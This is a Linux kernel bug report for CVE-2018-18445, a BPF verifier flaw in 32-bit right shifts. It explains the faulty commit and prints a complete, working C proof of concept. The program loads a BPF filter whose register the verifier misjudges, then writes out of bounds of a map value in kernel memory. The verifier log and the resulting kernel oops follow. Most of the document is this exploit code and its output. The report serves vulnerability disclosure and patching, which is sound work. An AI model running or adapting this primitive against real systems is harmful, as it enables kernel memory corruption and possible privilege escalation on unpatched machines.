Linux: bpf verifier: 32-bit RSH verification doesn't truncate input before the ALU op CVE-2018-18445 When I wrote commit 468f6eafa6c4 ("bpf: fix 32-bit ALU op verification"), I screwed up and assumed that, in order to emulate 64-bit arithmetic with 32-bit logic, it is sufficient to just truncate the output to 32 bits; and so I just moved the register size coercion that used to be at the start of the function to the end of the function. That assumption is true for almost every op, but not for 32-bit right shifts, because those can propagate information towards the least significant bit. Repro: user@debian:~/bpf_rsh32$ cat test.c #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define GPLv2 "GPL v2" #define ARRSIZE(x) (sizeof(x) / sizeof((x)[0])) /* registers */ /* caller-saved: r0..r5 */ #define BPF_REG_ARG1 BPF_REG_1 #define BPF_REG_ARG2 BPF_REG_2 #define BPF_REG_ARG3 BPF_REG_3 #define BPF_REG_ARG4 BPF_REG_4 #define BPF_REG_ARG5 BPF_REG_5 #define BPF_REG_CTX BPF_REG_6 #define BPF_REG_FP BPF_REG_10 #define BPF_LD_IMM64_RAW(DST, SRC, IMM) \ ((struct bpf_insn) { \ .code = BPF_LD | BPF_DW | BPF_IMM, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = (__u32) (IMM) }), \ ((struct bpf_insn) { \ .code = 0, /* zero is reserved opcode */ \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = ((__u64) (IMM)) >> 32 }) #define BPF_LD_MAP_FD(DST, MAP_FD) \ BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD) #define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \ ((struct bpf_insn) { \ .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,\ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0 }) #define BPF_MOV64_REG(DST, SRC) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_MOV | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0 }) #define BPF_ALU64_IMM(OP, DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) #define BPF_ALU32_IMM(OP, DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) #define BPF_STX_MEM(SIZE, DST, SRC, OFF) \ ((struct bpf_insn) { \ .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0 }) #define BPF_ST_MEM(SIZE, DST, OFF, IMM) \ ((struct bpf_insn) { \ .code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \ .dst_reg = DST, \ .src_reg = 0, \ .off = OFF, \ .imm = IMM }) #define BPF_EMIT_CALL(FUNC) \ ((struct bpf_insn) { \ .code = BPF_JMP | BPF_CALL, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = (FUNC) }) #define BPF_JMP_IMM(OP, DST, IMM, OFF) \ ((struct bpf_insn) { \ .code = BPF_JMP | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = OFF, \ .imm = IMM }) #define BPF_EXIT_INSN() \ ((struct bpf_insn) { \ .code = BPF_JMP | BPF_EXIT, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = 0 }) #define BPF_LD_ABS(SIZE, IMM) \ ((struct bpf_insn) { \ .code = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) #define BPF_ALU64_REG(OP, DST, SRC) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0 }) #define BPF_MOV64_IMM(DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_MOV | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) int bpf_(int cmd, union bpf_attr *attrs) { return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs)); } int array_create(int value_size, int num_entries) { union bpf_attr create_map_attrs = { .map_type = BPF_MAP_TYPE_ARRAY, .key_size = 4, .value_size = value_size, .max_entries = num_entries }; int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs); if (mapfd == -1) err(1, "map create"); return mapfd; } int prog_load(struct bpf_insn *insns, size_t insns_count) { char verifier_log[100000]; union bpf_attr create_prog_attrs = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = insns_count, .insns = (uint64_t)insns, .license = (uint64_t)GPLv2, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log }; int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs); int errno_ = errno; printf("==========================\n%s==========================\n", verifier_log); errno = errno_; if (progfd == -1) err(1, "prog load"); return progfd; } int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count) { int progfd = prog_load(insns, insns_count); // hook eBPF program up to a socket // sendmsg() to the socket will trigger the filter // returning 0 in the filter should toss the packet int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) err(1, "socketpair"); if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) err(1, "setsockopt"); return socks[1]; } void trigger_proc(int sockfd) { if (write(sockfd, "X", 1) != 1) err(1, "write to proc socket failed"); } int main(void) { int small_map = array_create(8, 1); struct bpf_insn insns[] = { BPF_MOV64_IMM(BPF_REG_8, 2), BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 31), BPF_ALU32_IMM(BPF_RSH, BPF_REG_8, 31), BPF_ALU32_IMM(BPF_SUB, BPF_REG_8, 2), // store r8 into map BPF_LD_MAP_FD(BPF_REG_ARG1, small_map), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4), BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0), BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_8), BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 0), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN() }; int sock_fd = create_filtered_socket_fd(insns, ARRSIZE(insns)); trigger_proc(sock_fd); } user@debian:~/bpf_rsh32$ gcc -o test test.c user@debian:~/bpf_rsh32$ ./test ========================== func#0 @0 0: R1=ctx(id=0,off=0,imm=0) R10=fp0,call_-1 0: (b7) r8 = 2 1: R1=ctx(id=0,off=0,imm=0) R8_w=inv2 R10=fp0,call_-1 1: (67) r8 <<= 31 2: R1=ctx(id=0,off=0,imm=0) R8_w=inv4294967296 R10=fp0,call_-1 2: (74) (u32) r8 >>= (u32) 31 3: R1=ctx(id=0,off=0,imm=0) R8_w=inv2 R10=fp0,call_-1 3: (14) (u32) r8 -= (u32) 2 4: R1=ctx(id=0,off=0,imm=0) R8_w=inv0 R10=fp0,call_-1 4: (18) r1 = 0x0 6: R1_w=map_ptr(id=0,off=0,ks=4,vs=8) R8_w=inv0 R10=fp0,call_-1 6: (bf) r2 = r10 7: R1_w=map_ptr(id=0,off=0,ks=4,vs=8) R2_w=fp0,call_-1 R8_w=inv0 R10=fp0,call_-1 7: (07) r2 += -4 8: R1_w=map_ptr(id=0,off=0,ks=4,vs=8) R2_w=fp-4,call_-1 R8_w=inv0 R10=fp0,call_-1 8: (62) *(u32 *)(r2 +0) = 0 9: R1_w=map_ptr(id=0,off=0,ks=4,vs=8) R2_w=fp-4,call_-1 R8_w=inv0 R10=fp0,call_-1 9: (85) call bpf_map_lookup_elem#1 10: R0=map_value_or_null(id=1,off=0,ks=4,vs=8,imm=0) R8=inv0 R10=fp0,call_-1 10: (55) if r0 != 0x0 goto pc+1 R0=inv0 R8=inv0 R10=fp0,call_-1 11: R0=inv0 R8=inv0 R10=fp0,call_-1 11: (95) exit 12: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R8=inv0 R10=fp0,call_-1 12: (0f) r0 += r8 13: R0_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R8=inv0 R10=fp0,call_-1 13: (7b) *(u64 *)(r0 +0) = r8 R0_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R8=inv0 R10=fp0,call_-1 14: R0_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R8=inv0 R10=fp0,call_-1 14: (b7) r0 = 0 15: R0_w=inv0 R8=inv0 R10=fp0,call_-1 15: (95) exit processed 15 insns (limit 131072), stack depth 4 ========================== Killed user@debian:~/bpf_rsh32$ sudo dmesg | grep -A100 BUG: [ 104.700036] BUG: unable to handle kernel paging request at ffff972ca86232ce [ 104.703975] PGD 149001067 P4D 149001067 PUD 0 [ 104.706411] Oops: 0002 [#1] SMP [ 104.708172] CPU: 6 PID: 1167 Comm: test Not tainted 4.19.0-rc6+ #180 [ 104.710720] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014 [ 104.713162] RIP: 0010:___bpf_prog_run+0xeb/0xee0 [ 104.714521] Code: 89 0c 10 e9 52 ff ff ff 0f b6 43 01 48 83 c3 08 89 c2 83 e0 0f c0 ea 04 48 8b 44 c5 00 0f b6 d2 48 8b 4c d5 00 48 0f bf 53 fa <48> 89 0c 10 e9 27 ff ff ff 0f b6 43 01 48 0f bf 4b 02 48 83 c3 08 [ 104.719997] RSP: 0018:ffffbc428207bc30 EFLAGS: 00010a02 [ 104.721535] RAX: ffff972ca86232ce RBX: ffffbc42817590a8 RCX: 00000000fffffffe [ 104.723675] RDX: 0000000000000000 RSI: 000000000000007b RDI: ffff972ba8623200 [ 104.725735] RBP: ffffbc428207bc78 R08: ffffffffbb14a180 R09: ffff972baa1c6700 [ 104.727799] R10: ffff972ba9220c00 R11: ffff972baa1c6700 R12: 0000000000000000 [ 104.729848] R13: ffffffffbc439340 R14: ffff972ba5b63400 R15: ffffbc428207bde0 [ 104.731915] FS: 00007f7352228700(0000) GS:ffff972bb3d80000(0000) knlGS:0000000000000000 [ 104.734647] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 104.736304] CR2: ffff972ca86232ce CR3: 00000002255c8001 CR4: 00000000003606e0 [ 104.738347] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 104.740411] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 104.742470] Call Trace: [ 104.743221] ? __bpf_prog_run32+0x33/0x50 [ 104.744423] ? alloc_skb_with_frags+0x64/0x1c0 [ 104.745700] ? wait_woken+0x80/0x80 [ 104.746716] ? apparmor_cred_alloc_blank+0x10/0x10 [ 104.748109] ? sk_filter_trim_cap+0x83/0x1b0 [ 104.749340] ? wait_for_unix_gc+0x34/0xb0 [ 104.750512] ? unix_dgram_sendmsg+0x20b/0x700 [ 104.751800] ? sock_sendmsg+0x36/0x40 [ 104.752879] ? sock_write_iter+0x8f/0xf0 [ 104.754036] ? __vfs_write+0x112/0x1a0 [ 104.755128] ? vfs_write+0xad/0x1a0 [ 104.756148] ? ksys_write+0x52/0xc0 [ 104.757120] ? do_syscall_64+0x55/0x110 [ 104.758237] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 104.759766] Modules linked in: xor zstd_compress raid6_pq [ 104.761363] CR2: ffff972ca86232ce [ 104.762336] ---[ end trace 17bac53c51559623 ]--- [ 104.763674] RIP: 0010:___bpf_prog_run+0xeb/0xee0 [ 104.765013] Code: 89 0c 10 e9 52 ff ff ff 0f b6 43 01 48 83 c3 08 89 c2 83 e0 0f c0 ea 04 48 8b 44 c5 00 0f b6 d2 48 8b 4c d5 00 48 0f bf 53 fa <48> 89 0c 10 e9 27 ff ff ff 0f b6 43 01 48 0f bf 4b 02 48 83 c3 08 [ 104.770407] RSP: 0018:ffffbc428207bc30 EFLAGS: 00010a02 [ 104.772021] RAX: ffff972ca86232ce RBX: ffffbc42817590a8 RCX: 00000000fffffffe [ 104.772022] RDX: 0000000000000000 RSI: 000000000000007b RDI: ffff972ba8623200 [ 104.772023] RBP: ffffbc428207bc78 R08: ffffffffbb14a180 R09: ffff972baa1c6700 [ 104.772024] R10: ffff972ba9220c00 R11: ffff972baa1c6700 R12: 0000000000000000 [ 104.772024] R13: ffffffffbc439340 R14: ffff972ba5b63400 R15: ffffbc428207bde0 [ 104.772026] FS: 00007f7352228700(0000) GS:ffff972bb3d80000(0000) knlGS:0000000000000000 [ 104.772027] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 104.772027] CR2: ffff972ca86232ce CR3: 00000002255c8001 CR4: 00000000003606e0 [ 104.772030] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 104.772031] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. Found by: jannh